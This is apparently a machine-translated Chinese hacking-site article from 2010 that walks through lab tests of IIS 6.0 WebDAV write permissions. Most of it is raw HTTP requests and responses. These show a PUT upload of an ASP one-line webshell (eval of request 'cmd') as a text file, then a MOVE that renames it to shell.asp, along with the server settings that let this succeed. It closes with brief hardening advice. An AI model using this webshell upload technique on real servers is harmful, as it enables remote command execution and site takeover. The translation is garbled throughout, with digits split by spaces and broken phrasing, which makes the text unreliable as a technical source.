IIS can be PUT, but can not MOVE of reason-vulnerability warning-the black bar safety net

2010-04-24T00:00:00
ID MYHACK58:62201026791
Type myhack58
Reporter 佚名
Modified 2010-04-24T00:00:00

Description

Today in the test IIS put vulnerability, found can put all IIS can't parse the file, the move is also normal, but it can not move as asp, asa and other IIS can parse the file, search the Internet for some articles, found is because the IIS configuration is not selected on the“script resource access”due. The General case of IIS configuration would be preferred on this, but just let me run into the below this article on this issue for a detailed description, go over the recording.

Original address: small conference of IIS special permissions Write the small conference IIS special permissions on a file after, in a laboratory internal report, I show you the IIS write permission for the use of, but without success, and wondered. Obviously I test before, how will die? It seems for sure is IIS configuration problem. That demo I'm using a new install of Win2003 virtual machine, IIS is using the default settings, and tick on the Home Directory tab under“write”check box. The failure of two places: 1. The OPTIONS command can't view IIS in support of the method of collection.

Submit the following packet:

OPTIONS / HTTP/1.1 Host: www.redicecn.cn

Returns the following message:

HTTP/1.1 2 0 0 OK Allow: OPTIONS, TRACE, GET, HEAD Content-Length: 0 Server: Microsoft-IIS/6.0 Public: OPTIONS, TRACE, GET, HEAD, POST X-Powered-By: ASP.NET Date: Mon, 0 1 Jan 2 0 1 0 0 7:3 9:5 6 GMT

Note: no returns IIS supports the method of collection.

(2)PUT the asp file and the txt file are failed.

Submit the following packet:

PUT /test.txt HTTP/1.1 Host: www.redicecn.cn Content-Length: 2 6

<%eval(request(“cmd”))%>

Returns the following message:

HTTP/1.1 5 0 1 Not Implemented Content-Length: 0 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 0 1 Jan 2 0 1 0 0 7:5 0:5 3 GMT

Note: there is no successful write.

Submit the following packet:

PUT /test. asp HTTP/1.1 Host: www.redicecn.cn Content-Length: 2 6

<%eval(request(“cmd”))%>

Returns the following message:

HTTP/1.1 4 0 4 Not Found Content-Length: 8 3 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 0 1 Jan 2 0 1 0 0 7:4 3:0 7 GMT

<html><head><title>Error</title>< /head><body>the system cannot find the file specified. </body></html>

Note: there is no successful write.

Problem to solve:

Today suddenly in the IIS“Web Service Extensions”list see“WebDAV”is disabled, will not be because of the“WebDAV”is disabled. the reason? Enable“WebDAV”, ha ha, turned out to be successful, it really is“WebDAV”disabled reason.

Again submit the following packet(OPTIONS command: the

OPTIONS / HTTP/1.1 Host: www.redicecn.cn

Returns the following message:

HTTP/1.1 2 0 0 OK Date: Mon, 0 1 Jan 2 0 1 0 0 7:5 4:5 5 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET MS-Author-Via: DAV Content-Length: 0 Accept-Ranges: none DASL: <DAV:sql> DAV: 1, 2 Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK Cache-Control: private

Note: IIS returns successfully support the method of collection.

Again submit the following packet:

PUT /test.txt HTTP/1.1 Host: www.redicecn.cn Content-Length: 2 6

<%eval(request(“cmd”))%>

Returns the following message:

HTTP/1.1 2 0 1 Created Date: Mon, 0 1 Jan 2 0 1 0 0 7:5 7:4 4 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: <http://www.redicecn.cn/test.txt> Content-Length: 0 Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Success in the IIS root directory to write the test. txt file. But directly PUT the asp file still returns the same error message. Small black are the commonly used method is to PUT the txt the horse, and then use the MOVE method will txt the horse was renamed to the asp horse.

Try to submit the following packet:

MOVE /test.txt HTTP/1.1 Host: www.redicecn.cn Destination: <http://www.redicecn.cn/shell.asp>

Returns the following message:

HTTP/1.1 2 0 7 Multi-Status Date: Mon, 0 1 Jan 2 0 1 0 0 8:0 2:0 7 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: <http://www.redicecn.cn/shell.asp> Content-Type: text/xml Transfer-Encoding: chunked

b8 <? xml version="1.0"?& gt;<a:multistatus xmlns:a=”DAV:”><a:response><a:href>http://www.redicecn.cn/shell.asp</a:href><a:status>HTTP/1.1 4 0 3 Forbidden</a:status></a:response></a:multistatus> 0

Note: a failed, depressed Ah. It seems that IIS on what authority. The impasse....

2 0 1 0 in the morning I turned a little to the hacker penetration notes on knowledge-based Rogue to me, his friend Ice the origin of the book, and sent him two books, in the in-depth analysis of the IIS write permissions on a section, I found the author came across and I like the questions, he gives the solution is to tick the“script resource access”check box. Test it out:

Submit the following packet:

MOVE /test.txt HTTP/1.1 Host: www.redicecn.cn Destination: <http://www.redicecn.cn/shell.asp>

Returns the following message:

HTTP/1.1 2 0 1 Created Date: Mon, 0 1 Jan 2 0 1 0 0 8:0 9:1 8 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: <http://www.redicecn.cn/shell.asp> Content-Type: text/xml Content-Length: 0

Success. I also tested it in did not tick the“script resource access”check box for the case is can use the MOVE the files renamed to a non-script file name, for example, gif, txt. But directly PUT the asp file still returns the same error message. It seems this problem is also really bad solution, for the time being put down.

Finally, I also want to test it, the NTFS permissions are set whether it is possible for IIS write permissions to the impact of:

Test one: The site root directory set the IIS anonymous account permissions to allow“read and run, List Folder Contents, read”, the other is not ticked. Through the test, can be successfully PUT to write into the file.

Test two: The site root directory set the IIS anonymous account permissions to allow“read and run, List Folder Contents, and read”, and tick disable“write.” After testing, you can PUT the write to file fails. Return the packet as follows:

HTTP/1.1 4 0 1 Unauthorized Content-Length: 7 5 Content-Type: text/htmlServer: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 0 1 Jan 2 0 1 0 0 8:3 3:0 9 GMT

<html><head><title>Error</title>< /head><body>error: access is denied.& lt;/body></html>

Note: the write operation is rejected.

Now to summarize:

(1)If you do not enable“WebDAV”extensions, the OPTIONS command is unable to view IIS supports the method of collection. Even if it is a check on“write”, and still cannot write to a txt file asp of course no one. (2)enable“WebDAV”extensions, and check the“write”that can write to the txt file. You want to use the MOVE command to rename the script file suffix, you must also check on the“script resource access”. (3)only set up the IIS anonymous account to prohibit“write”NTFS permissions to deny writes. Note: This deny write permission to everyone very easy to overlook, if not set, or can be successfully written to the file. It is not just for IIS write permissions, I had used the script Trojan tested, if there is no prohibition to write, the script Trojan can create and modify files. On the Win2003 security settings policies, you can participate in my other article the Windows Server Security Settings the Raiders action.

Safety tips: do not open the“WebDAV”extensions!